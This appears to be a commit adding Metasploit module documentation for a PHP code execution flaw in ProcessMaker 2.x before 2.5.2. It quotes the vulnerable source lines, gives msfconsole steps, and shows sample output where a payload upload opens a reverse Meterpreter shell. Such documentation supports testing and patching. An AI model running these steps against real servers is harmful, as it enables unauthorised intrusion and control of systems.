Add documentation

bug/bundler_fix
Brendan Coles 2017-05-30 08:40:57 +00:00
parent 59ab73b9a9
commit 475510787d
1 changed files with 93 additions and 0 deletions

View File

@ -0,0 +1,93 @@
## Description
This module exploits a PHP code execution vulnerability in the default *neoclassic* skin for [ProcessMaker Open Source](http://www.processmaker.com/) which allows any authenticated user to execute PHP code. The vulnerable skin is installed by default in version 2.x prior to 2.5.2 and cannot be removed via the web interface.
## Vulnerable Application
ProcessMaker is an open source, workflow management software suite, which includes tools to automate your workflow, design forms, create documents, assign roles and users, create routing rules, and map an individual process quickly and easily. It's relatively lightweight and doesn't require any kind of installation on the client computer.
This module has been tested successfully on ProcessMaker Open Source versions 2.5.1, 2.5.0, 2.0.23 on Windows XP SP3; and version 2.0.45 on Debian Linux.
The vulnerability was patched in version 2.5.2.
Source and Installers:
* [ProcessMaker Open Source 2.0.x](https://sourceforge.net/projects/processmaker/files/ProcessMaker/2.0/)
* [ProcessMaker Open Source 2.5.x](https://sourceforge.net/projects/processmaker/files/ProcessMaker/2.5/)
## Technical Details
Several files within the default *neoclassic* skin allow authenticated users to supply a PHP function in the `action` parameter and arguments for the aforementioned function in the `params` parameter. The application calls the supplied function name with the supplied parameters resulting in execution of arbitrary user supplied PHP code.
The relevant source code for the affected files is shown below.
**appFolder/appFolderAjax.php**
```php
if (($_REQUEST['action']) != 'rename') {
$functionName = $_REQUEST ['action'];
$functionParams = isset ($_REQUEST ['params']) ? $_REQUEST ['params'] : array ();
$functionName ($functionParams);
```
**cases/casesStartPage_Ajax.php**
```php
$functionName = $_REQUEST['action'];
$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
$functionName( $functionParams );
```
**cases/cases_SchedulerGetPlugins.php**
```php
$functionName = $_REQUEST['action'];
$functionParams = isset( $_REQUEST['params'] ) ? $_REQUEST['params'] : array ();
$functionName( $functionParams );
```
## Verification Steps
1. Start `msfconsole`
2. Do: `use exploit/multi/http/processmaker_exec`
3. Do: `set username [USER]`
4. Do: `set password [PASS]`
5. Do: `set rhost [IP]`
6. Do: `run`
7. You should get a session
## Sample Output
```
msf exploit(processmaker_exec) > check
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending check
[+] The target is vulnerable.
msf exploit(processmaker_exec) > exploit
[*] Started reverse handler on 192.168.172.1:4444
[*] 192.168.172.135:80 - Authenticating as user 'admin'
[+] 192.168.172.135:80 - Authenticated as user 'admin'
[*] 192.168.172.135:80 - Sending payload 'V7hd5EevO9Ho.php' (1795 bytes)
[+] 192.168.172.135:80 - Payload sent successfully
[*] 192.168.172.135:80 - Retrieving file 'V7hd5EevO9Ho.php'
[*] Sending stage (39195 bytes) to 192.168.172.135
[*] Meterpreter session 3 opened (192.168.172.1:4444 -> 192.168.172.135:32789) at 2013-10-29 09:53:08 -0500
[+] Deleted V7hd5EevO9Ho.php
^C[-] Exploit failed: Interrupt
meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer : processmaker
OS : Linux processmaker 3.2.0-4-amd64 #1 SMP Debian 3.2.51-1 x86_64
Meterpreter : php/php
meterpreter > exit
```